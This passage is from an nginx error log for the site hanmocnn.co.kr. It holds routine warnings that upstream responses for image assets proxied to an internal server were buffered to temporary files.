"https://www.hanmocnn.co.kr/" -2026/02/16 04:51:02 [warn] 855#855: *32366 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/58/0000008587 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 04:51:02 [warn] 855#855: *32366 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/58/0000008588 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 05:29:21 [warn] 855#855: *32388 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/58/0000008589 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 05:29:21 [warn] 855#855: *32388 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/59/0000008590 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 05:42:35 [warn] 855#855: *32425 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/59/0000008591 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 06:01:02 [warn] 860#860: *32462 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/59/0000008592 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 06:05:35 [warn] 862#862: *32473 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/59/0000008593 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 06:05:35 [warn] 862#862: *32473 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/59/0000008594 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 06:15:25 [warn] 865#865: *32495 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/59/0000008595 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 06:21:20 [warn] 864#864: *32525 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/59/0000008596 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 06:21:20 [warn] 864#864: *32525 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/59/0000008597 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 06:21:28 [warn] 864#864: *32525 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/59/0000008598 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 06:30:54 [warn] 860#860: *32561 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/59/0000008599 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 06:30:54 [warn] 860#860: *32561 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/60/0000008600 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 06:34:38 [warn] 860#860: *34071 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/34/0000009344 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 06:34:38 [warn] 860#860: *34071 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/34/0000009345 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 06:37:05 [warn] 860#860: *34071 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/34/0000009346 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 06:37:05 [warn] 860#860: *34071 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/34/0000009347 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 06:41:39 [warn] 860#860: *34100 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/34/0000009348 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 06:41:39 [warn] 860#860: *34100 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/34/0000009349 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 08:40:37 [warn] 861#861: *34218 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/35/0000009351 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 08:40:37 [warn] 861#861: *34218 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/35/0000009352 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 08:40:37 [warn] 861#861: *34218 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/35/0000009353 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 08:50:01 [warn] 865#865: *34234 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/35/0000009354 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 08:50:01 [warn] 865#865: *34234 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/35/0000009355 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 08:52:21 [warn] 865#865: *34246 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/35/0000009356 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 08:52:21 [warn] 865#865: *34246 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/35/0000009357 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 08:55:37 [warn] 865#865: *34257 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/35/0000009358 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 08:55:37 [warn] 865#865: *34257 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/35/0000009359 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 08:55:37 [warn] 865#865: *34257 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/36/0000009360 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 08:57:12 [warn] 865#865: *34267 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/36/0000009361 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 09:38:29 [warn] 865#865: *34306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/36/0000009362 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 09:38:29 [warn] 865#865: *34306 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/36/0000009363 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 10:00:53 [warn] 863#863: *34340 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/36/0000009364 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 10:00:53 [warn] 863#863: *34340 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/36/0000009365 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 10:00:54 [warn] 863#863: *34340 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/36/0000009366 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 10:04:45 [warn] 863#863: *34353 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/36/0000009367 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 10:04:45 [warn] 863#863: *34353 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/36/0000009368 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 12:00:56 [warn] 872#872: *35941 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/11/0000010112 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 14:21:29 [warn] 874#874: *37574 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/86/0000010861 while reading upstream, client: 64.227.134.113, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 19:02:34 [warn] 884#884: *39314 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/86/0000010862 while reading upstream, client: 66.249.66.78, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr" -2026/02/16 19:21:51 [warn] 884#884: *39338 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/86/0000010863 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 19:24:26 [warn] 884#884: *39350 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/86/0000010864 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 19:24:26 [warn] 884#884: *39350 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/86/0000010865 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 19:24:26 [warn] 884#884: *39350 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/86/0000010866 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 19:33:39 [warn] 884#884: *39364 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/86/0000010867 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 19:33:39 [warn] 884#884: *39364 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/86/0000010868 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 19:33:39 [warn] 884#884: *39364 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/86/0000010869 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 19:34:34 [warn] 884#884: *39364 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/87/0000010870 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 19:34:34 [warn] 884#884: *39364 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/87/0000010871 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 19:38:52 [warn] 884#884: *39387 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/87/0000010872 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 19:38:52 [warn] 884#884: *39387 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/87/0000010873 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 19:38:52 [warn] 884#884: *39387 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/87/0000010874 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 19:38:53 [warn] 884#884: *39387 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/87/0000010875 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 19:40:25 [warn] 884#884: *39399 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/87/0000010876 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 19:40:25 [warn] 884#884: *39399 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/87/0000010877 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 19:51:46 [warn] 884#884: *39417 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/87/0000010878 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 19:51:46 [warn] 884#884: *39417 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/87/0000010879 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 19:51:46 [warn] 884#884: *39417 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/88/0000010880 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:13:54 [warn] 882#882: *39438 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/88/0000010881 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:13:54 [warn] 882#882: *39438 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/88/0000010882 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:14:52 [warn] 882#882: *39438 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/88/0000010883 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:20:12 [warn] 882#882: *39462 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/88/0000010884 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:20:12 [warn] 882#882: *39462 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/88/0000010885 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:22:41 [warn] 882#882: *39476 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/88/0000010886 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:22:41 [warn] 882#882: *39476 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/88/0000010887 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:22:41 [warn] 882#882: *39476 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/88/0000010888 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:22:41 [warn] 882#882: *39476 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/88/0000010889 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:24:17 [warn] 882#882: *39491 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/89/0000010890 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/16 20:24:17 [warn] 882#882: *39491 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/89/0000010891 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: 